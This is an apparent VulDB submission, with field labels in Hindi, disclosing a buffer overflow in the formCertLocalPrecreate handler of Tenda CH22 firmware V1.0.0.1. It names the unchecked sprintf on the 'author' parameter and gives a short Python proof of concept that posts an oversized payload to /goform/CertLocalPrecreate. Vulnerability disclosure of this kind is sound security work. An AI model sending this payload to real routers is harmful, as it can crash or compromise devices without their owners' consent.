| शीर्षक | Tenda CH22 V1.0.0.1 Buffer Overflow |
|---|
| विवरण | ## Overview
- Firmware download website: https://www.tenda.com.cn/download/2230
## Affected version
CH22 V1.0.0.1
## Vulnerability details
The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `formCertLocalPrecreate` function. The `V11` variable receives the `author` parameter from a POST request and is later passed to the `sprintf` function. However, since the user can control the input of `author` , the statement `sprintf(s, "CN = %s/emailAddress=%s\n", v11, v10);` can cause a buffer overflow.
## PoC
```
import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/CertLocalPrecreate'
payload = b'a' * 1000
data = {
'author':payload
}
requests.post(url, data=data)
``` |
|---|
| स्रोत | ⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-formCertLocalPrecreate-377df0aa118580e99c96f8ecf4475563 |
|---|
| उपयोगकर्ता | ysnysn0121 (UID 86198) |
|---|
| सबमिशन | 13/06/2026 04:13 PM (1 महीना पहले) |
|---|
| संयम | 18/07/2026 12:08 PM (1 month later) |
|---|
| स्थिति | प्रतिलिपि |
|---|
| VulDB प्रविष्टि | 355396 [Tenda CH22 1.0.0.1 Parameter CertLocalPrecreate formCertLocalPrecreate standard बफ़र ओवरफ़्लो] |
|---|
| अंक | 0 |
|---|